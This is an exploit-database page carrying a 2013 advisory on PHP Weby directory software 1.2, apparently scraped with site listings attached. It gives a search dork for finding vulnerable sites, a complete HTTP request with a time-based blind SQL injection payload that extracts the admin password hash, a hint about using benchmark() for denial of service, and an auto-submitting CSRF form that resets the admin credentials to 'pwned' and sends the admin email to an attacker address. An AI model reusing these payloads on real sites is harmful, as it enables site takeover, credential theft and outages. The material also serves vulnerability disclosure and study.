Menu

Search for hundreds of thousands of exploits

"PHP weby directory software 1.2 - Multiple Vulnerabilities"

Author

Exploit author

AkaStep

Platform

Exploit platform

php

Release date

Exploit published date

2013-01-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
===========================================
Vulnerable Software: PHP Weby directory software version 1.2
Vendor: http://phpweby.com
Download: ht*p://phpweby.com/down/phpwebydirectory.zip
Vuln: Blind SQL injection && CSRF
Dork: intext:Powered by PHP weby software
===========================================
About Software:

Php Weby directory script is a powerful and easy-to-use FREE link management
script with numerous options for running a directory, catalog of sites or a simple
link exchange system. Create a general directory and have users submit their 
favorite sites and charge if you want for the review.
Or create regional directory for your town or state and sell advertising,
or niche directory about a topic you love or know.

Features include an integrated payment system with PayPal,
link validation, SEO urls, unlimited categories and subcategories,
reciprocal linking, link editor,
template driven system and many more. Check them all here.
Php weby free link directory script is licensed under GNU GPL license.
Link to http://phpweby.com can NOT be removed. Contact us at the forums for more information. .
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================

Here is one of Vulnerable Code example:

//contact.php
==============SNIP BEGINS===============
if($capt)
{
unset($capt);
if($_POST['fullname']=='' || $_POST['subject']=='' || $_POST['message']=='' || $_POST['mail']=='')
$smarty->assign('error','Please complete the form!');
else
{
$c=$db->Execute("INSERT INTO contacts(fullname,subject,message,mail,ip,timehour) values('" . $_POST['fullname'] . "','" . $_POST['subject'] . "','" . $_POST['message'] . "','" . $_POST['mail'] . "','" . $_SERVER['REMOTE_ADDR']."','".date('r'). "')");
if($c===false)
$smarty->assign('error','Unknown error occured.');
else
$smarty->assign('added',1);

===========SNIP ENDS HERE================


===============Exploitation ===============
METHOD: $_POST
URL: http://site.tld/contact.php

Headers:

Host: hacker1.own
User-Agent: UiUiUiUiUi Ping And UiUiUiUiUi And Pong:((
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245


REQ BODY:

fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST


===================EOF===================

Here is how it looks:
(I prefer timebased way because simply extracting and then inserting hash to table is not usefull anymore.Only admin can see it from admin panel).

IMAGE 1: http://s017.radikal.ru/i420/1301/c6/11128cbea352.png
COPY IMAGE: http://oi47.tinypic.com/2ptp79g.jpg


Also this type of sql injections(INSERT/UPDATE) is usefull to create Denial of Service conditions against target site/server.
If so simply benchmark() is your best friend.


Second Vulnerability is: CSRF

Simple exploit to change admin username/password/email:
Login/password will be change to pwned and email to : admin@toattacker.tld

<body onload="javascript:document.forms[0].submit()">
<form action="http://server/phpweb/admin/options.php?r=admin" method="post">
<input type="text" name="ADMIN_NAME" value="admin"/>
<input type="text" name="ADMIN_MAIL" value="admin@toattacker.tld"/>
<input type="text" name="usr" value="pwned"/>
<input type="password" name="pass1" value="pwned"/>
<input type="password" name="pass2" value="pwned"/>
<input type="hidden" name="oldusr" value="admin"/>
<input type="submit" value="Save" class="ss"/>
</form>



====================================
           KUDOSSSSSSS
====================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers.

Also special thanks to: ottoman38 & HERO_AZE
====================================

/AkaStep
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2013-04-03 "SmallFTPd - Denial of Service" dos windows AkaStep
2013-03-15 "ClipShare 4.1.4 - Multiple Vulnerabilities" webapps php AkaStep
2013-02-20 "CKEditor 4.0.1 - Multiple Vulnerabilities" webapps php AkaStep
2013-02-19 "CKEditor - 'posteddata.php' Cross-Site Scripting" webapps php AkaStep
2013-02-05 "Glossword 1.8.3 - SQL Injection" webapps php AkaStep
2013-02-05 "glossword 1.8.12 - Multiple Vulnerabilities" webapps php AkaStep
2013-01-28 "PHP weby directory software 1.2 - Multiple Vulnerabilities" webapps php AkaStep
2013-01-25 "PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections" webapps php AkaStep
2013-01-18 "PHP-Charts - Arbitrary PHP Code Execution" webapps php AkaStep
2013-01-08 "MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure" webapps php AkaStep
2013-01-02 "osTicket - 'l.php?url' Arbitrary Site Redirect" webapps php AkaStep
2013-01-02 "osTicket - 'tickets.php?status' Cross-Site Scripting" webapps php AkaStep
2012-12-04 "Sourcefabric Newscoop - 'f_email' SQL Injection" webapps php AkaStep
2012-11-23 "Greenstone - Multiple Vulnerabilities" remote multiple AkaStep
2012-09-22 "WordPress 3.4.2 - Cross-Site Request Forgery" webapps php AkaStep
2012-09-18 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities" webapps php AkaStep
2012-09-04 "Sciretech (Multiple Products) - Multiple SQL Injections" webapps php AkaStep
2012-09-03 "Sitemax Maestro - SQL Injection / Local File Inclusion" webapps php AkaStep
2012-06-22 "Cotonti - 'admin.php' SQL Injection" webapps php AkaStep
2012-06-21 "traq 2.3.5 - Multiple Vulnerabilities" webapps php AkaStep
2012-05-27 "AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities" webapps php AkaStep
2012-05-23 "Ajaxmint Gallery 1.0 - Local File Inclusion" webapps php AkaStep
2012-05-23 "Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal" webapps php AkaStep
2012-05-20 "Concrete5 FlashUploader - Arbitrary '.SWF' File Upload" webapps php AkaStep
2012-05-20 "Concrete CMS < 5.5.21 - Multiple Vulnerabilities" webapps php AkaStep
2012-05-10 "Chevereto 1.91 - '/Upload/engine.php?v' Traversal Arbitrary File Enumeration" webapps php AkaStep
2012-05-10 "Chevereto 1.91 - '/Upload/engine.php?v' Cross-Site Scripting" webapps php AkaStep
2012-04-27 "MySQLDumper 1.24.4 - 'sql.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php AkaStep
2012-04-27 "MySQLDumper 1.24.4 - 'install.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php AkaStep
2012-04-27 "MySQLDumper 1.24.4 - 'install.php?language' Traversal Arbitrary File Access" webapps perl AkaStep
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.